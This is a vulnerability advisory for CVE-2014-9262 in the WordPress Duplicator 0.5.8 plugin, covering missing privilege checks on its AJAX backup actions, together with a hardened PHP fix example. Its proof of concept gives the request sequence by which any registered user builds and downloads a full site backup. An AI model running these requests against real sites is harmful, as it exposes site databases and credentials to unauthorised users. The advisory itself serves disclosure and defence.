Duplicator 0.5.8 Privilege Escalation

Homepage:

https://wordpress.org/plugins/duplicator/

CVE-ID

CVE-2014-9262

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

Package functions are accessible to every registered user because admin privileges are not checked properly: the AJAX actions below are hooked with wp_ajax_*, which fires for any authenticated user, and the callbacks do not verify a capability.

As a result, every registered user can create and download backup files.

File: duplicator\duplicator.php

add_action('wp_ajax_duplicator_package_scan',		'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build',		'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete',		'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report',		'duplicator_package_report');
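The missing check, shown as an added example that is not the plugin's own code: the unguarded handler shape the advisory describes next to a hardened one that gates the same AJAX action on a nonce and an administrator capability (the handler names and the 'nonce' parameter are hypothetical).

```php
<?php
// Added example, not the plugin's code. Handler names are hypothetical.

// Vulnerable shape (as in the advisory): any logged-in user who reaches
// admin-ajax.php?action=duplicator_package_build runs this, because
// wp_ajax_* hooks fire for every authenticated user and nothing else gates it.
function duplicator_package_build_unchecked() {
    // ... build the package and echo JSON ...
}

// Hardened shape: verify a nonce tied to the action, then require an
// administrator-only capability before any work happens.
function duplicator_package_build_checked() {
    // Dies with -1 when the 'nonce' request parameter is missing or invalid.
    check_ajax_referer('duplicator_package_build', 'nonce');

    // 'manage_options' is granted only to administrators by default, so a
    // subscriber created through wp-login.php?action=register stops here.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(array('message' => 'Insufficient privileges'));
    }

    // ... build the package here ...
    wp_send_json_success(array('File' => 'example-package.zip'));
}
add_action('wp_ajax_duplicator_package_build', 'duplicator_package_build_checked');

// The admin page that issues the AJAX request must carry the matching token,
// e.g. wp_create_nonce('duplicator_package_build') sent as the 'nonce' field.
```

The same two checks apply to the scan, delete and report actions listed above; the nonce also blocks the request being triggered cross-site from an administrator's browser.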

Proof of Concept:

Log in as a regular user (created using wp-login.php?action=register), then start a scan:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan

After that you can build a backup:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build

This function returns JSON with the backup name in the File key.

You can download the backup using:

http://wordpress-url/wp-snapshots/%file_name_from_json%

Timeline: